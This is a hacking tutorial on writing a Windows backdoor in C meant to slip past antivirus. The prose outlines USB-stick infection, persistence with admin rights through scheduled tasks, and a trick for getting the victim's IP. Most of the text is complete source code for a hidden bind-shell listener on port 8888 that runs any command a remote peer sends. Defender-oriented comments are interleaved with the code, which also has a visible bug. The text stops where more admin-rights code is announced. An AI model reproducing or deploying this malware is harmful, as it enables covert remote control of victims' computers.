How to Program a C Backdoor (And Infect Any PC with an USB Key, and Three Seconds)
This how-to is aimed at anyone with good C knowledge who's tired of msfpayload backdoors that are often detected.
I) INTRODUCTION
- What's a backdoor ?
- What's an APT ?
1) Basic threat like raw msfpayloads (script-kiddies level)
2) Basic developers (for example, using basic msfpayloads and a "legitimate program" with a code template)
3) APT which is the most Advanced level.
- What are we gonna do ?
II) GENERAL IDEA
- What do we want ?
We also want it PERSISTENT.
We'll also need to improve it.
Oh, and we also want to backdoor any PC just by plugging an USB stick and clicking on our installer, this must take less than 3 seconds
- How to do it ?
Sending forged packets ( port scanner, dos tool...)
Sniffing traffic (sniffers)
Client/Servers applications
So how to use sockets to program a backdoor ?
Well a backdoor is a Client or a Server.
Bind shell backdoors are servers : they bind to a local port and wait for incoming connections in order to provide a shell
Reverse shell backdoors are clients : they connect to a specified IP to provide a shell.
Reverse shells are widely used as they're less "suspicious".
BUT when you use reverse backdoors, you need to specify YOUR IP. Unpleasant, right? Until you've got hacked servers or a public IP, this will lead any tracker to your home.
That's why, we'll program a bind shell backdoor. So, if you protect your IP, you'll be less endangered.
BUT How to connect to our backdoor if we don't know what is its IP ? Or if its IP change ? That's why we'll also use a little hack to get the victim IP.
So it's kinda, "hey, now I've got your address: Knock Knock!!"
- Make it persistent ?
BUT this is not sufficient. We want ADMIN RIGHTS. So we'll use "schtasks" with an XML file to create a task at startup that will auto-launch our backdoor with admin rights.
- Get Victims IP ?
http://pastebin.com/g9R53Tri
This is a copy paste
#include<stdio.h>
#include<stdlib.h>
#include<string.h>
#include<winsock2.h>
#pragma comment(lib,"ws2_32.lib") //Winsock Library
/*
 * Entry point: hides the process's own console window, then calls
 * backdoor() and returns 0 once that call returns. argc and argv are
 * not used.
 *
 * Analyst note: after the two ShowWindow() calls the process keeps running
 * with no visible window, so it will not appear on the desktop or taskbar;
 * it has to be found through the process list or its listening socket.
 */
int main(int argc, char *argv[])
{
// Handle of the console window attached to this process.
HWND hWnd = GetConsoleWindow();
ShowWindow(hWnd, SW_MINIMIZE); //won't hide the window without SW_MINIMIZE
ShowWindow(hWnd, SW_HIDE);
// All network and command-execution behaviour lives in backdoor().
backdoor();
return 0;
}
/*
 * backdoor - TCP listener that runs whatever text a connected peer sends.
 *
 * Behaviour visible in this function:
 *   - binds a stream socket to INADDR_ANY (every local interface), port 8888;
 *   - accepts connections and reads messages from the peer in a loop;
 *   - the exact message "chdir" starts a two-step exchange in which the
 *     next message is passed to chdir();
 *   - any other message is passed unchanged to system();
 *   - when system() returns 0, the contents of cmd.txt in the current
 *     directory are sent back to the peer.
 * The exchange is plain text: this function performs no authentication and
 * no encryption.
 *
 * Returns 1 if WSAStartup() or a checked send() fails, calls
 * exit(EXIT_FAILURE) if bind() fails, and returns 0 after the accept loop
 * ends and the socket is closed.
 *
 * Indicators a defender can derive from the code as written:
 *   - a listening TCP socket on 0.0.0.0:8888 owned by a windowless process;
 *   - command-interpreter child processes spawned by that process
 *     (system() hands the string to the command interpreter);
 *   - a file named cmd.txt in the process's working directory;
 *   - the literal strings "\n !!! WRONG COMMAND !!!", "\n Chdir to : " and
 *     "\n Chdir success !\n" in the binary and, unencrypted, on the wire.
 */
int backdoor()
{
WSADATA wsa;
SOCKET s, new_socket;
struct sockaddr_in server, client;
int c;
// server_reply holds each message received from the peer.
char *message, server_reply[100000];
int recv_size;
// The printf/puts calls in this function write to the console that main()
// has hidden, so they are debug traces, not user-visible output.
printf("\nInitialising Winsock...");
// Request Winsock version 2.2.
if (WSAStartup(MAKEWORD(2, 2), &wsa) != 0)
{
printf("Failed. Error Code : %d", WSAGetLastError());
return 1;
}
printf("Initialised.\n");
//Create a socket
if ((s = socket(AF_INET, SOCK_STREAM, 0)) == INVALID_SOCKET)
{
printf("Could not create socket : %d", WSAGetLastError());
}
printf("Socket created.\n");
//Prepare the sockaddr_in structure
// INADDR_ANY + port 8888: reachable on every interface of the host, which
// is what shows up in a listening-port inventory of the machine.
server.sin_family = AF_INET;
server.sin_addr.s_addr = INADDR_ANY;
server.sin_port = htons(8888);
//Bind
if (bind(s, (struct sockaddr *)&server, sizeof(server)) == SOCKET_ERROR)
{
printf("Bind failed with error code : %d", WSAGetLastError());
exit(EXIT_FAILURE);
}
puts("Bind done");
//Listen to incoming connections
// Backlog of 3 pending connections.
listen(s, 3);
//Accept and incoming connection
puts("Waiting for incoming connections...");
// c is the address-length argument passed to accept().
c = sizeof(struct sockaddr_in);
FILE *fp2;
char ch;
int i = 0;
int clean_array = 0;
// array receives the contents of cmd.txt before they are sent to the peer.
char array[10000];
// Shell redirect suffix that names cmd.txt.
char concat[11] = " > cmd.txt";
// Fixed protocol strings sent to the peer; usable as content signatures.
char error_message[100] = "\n !!! WRONG COMMAND !!!" ;
char chdir_message[100] = "\n Chdir to : ";
char chdir_success[100] = "\n Chdir success !\n";
int ret;
int chdir_flag;
// Outer loop: one iteration per accepted connection.
while ((new_socket = accept(s, (struct sockaddr *)&client, &c)) != INVALID_SOCKET)
{
puts("Connection accepted");
int a = 1;
// Inner loop: one iteration per message from the connected peer.
while (a == 1)
{
// Read up to sizeof(server_reply) - 1 bytes; everything in server_reply
// from here on is peer-controlled data.
if ((recv_size = recv(new_socket, server_reply, sizeof(server_reply) - 1, 0)) == SOCKET_ERROR)
{
puts("recv failed");
}
else
{
printf("recv size : %d\n", recv_size);
// Terminate the received bytes so they can be handled as a C string.
server_reply[recv_size] = '\0';
printf("INPUT : %s\n", server_reply);
// Exact-match test for the built-in "chdir" keyword (0 means equal).
chdir_flag = strcmp(server_reply, "chdir");
printf(">>> %d <<<\n", chdir_flag);
if (chdir_flag == 0)
{
// Prompt the peer for the directory.
if (send(new_socket, chdir_message, strlen(chdir_message), 0) < 0)
{
puts("Send failed");
return 1;
}
// Second message of the exchange: the directory path.
if ((recv_size = recv(new_socket, server_reply, sizeof(server_reply) - 1, 0)) == SOCKET_ERROR)
{
puts("recv failed");
}
printf("CHDIR : %d\n", recv_size);
server_reply[recv_size] = '\0';
printf("INPUT : %s\n", server_reply);
// Change the process's working directory to the peer-supplied path. The
// result of chdir() is not examined, so the success message below is sent
// in either case; do not read it as proof when interpreting captured traffic.
chdir(server_reply);
printf("Chdir DONE !!!\n");
chdir_flag = 1;
if (send(new_socket, chdir_success, strlen(chdir_success), 0) < 0)
{
puts("Send failed");
return 1;
}
}
else
{
printf("Command output >>\n");
// The peer's text is executed as a command line with this process's
// privileges. Each call produces a child process, which is the most
// reliable host-side trace of this code.
ret = system(server_reply);
printf("\n\n>>> %d <<<\n\n", ret);
i = 0;
if (ret == 0)
{
// Read cmd.txt from the current working directory one character at a
// time, echoing it to the console and copying it into array.
fp2 = fopen("cmd.txt", "r");
while ((ch = fgetc(fp2)) != EOF)
{
printf("%c", ch);
array[i] = ch;
i++;
}
array[i] = '\0';
// NOTE(review): confirm during analysis whether cmd.txt is actually gone
// after this point; treat it as a possible on-disk artifact.
remove(fp2);
fclose(fp2);
// Send the file contents back to the peer in clear text.
if (send(new_socket, array, strlen(array), 0) < 0)
{
puts("Send failed");
return 1;
}
// Zero the whole buffer before the next command.
for (i = 0; i < 10000; i++)
array[i] = '\0';
}
// A return value of exactly 1 from system() is reported to the peer as a
// wrong command.
if (ret == 1)
send(new_socket, error_message, strlen(error_message), 0);
}
}
}
// Checked after the per-message loop, still inside the accept loop.
if (new_socket == INVALID_SOCKET)
{
printf("accept failed with error code : %d", WSAGetLastError());
return 1;
}
}
// Reached only when accept() returns INVALID_SOCKET: release the listening
// socket and Winsock.
closesocket(s);
WSACleanup();
return 0;
}
END !
This is the servers/Backdoor code.
Then we'll use the following C code (to be executed with ADMIN RIGHTS)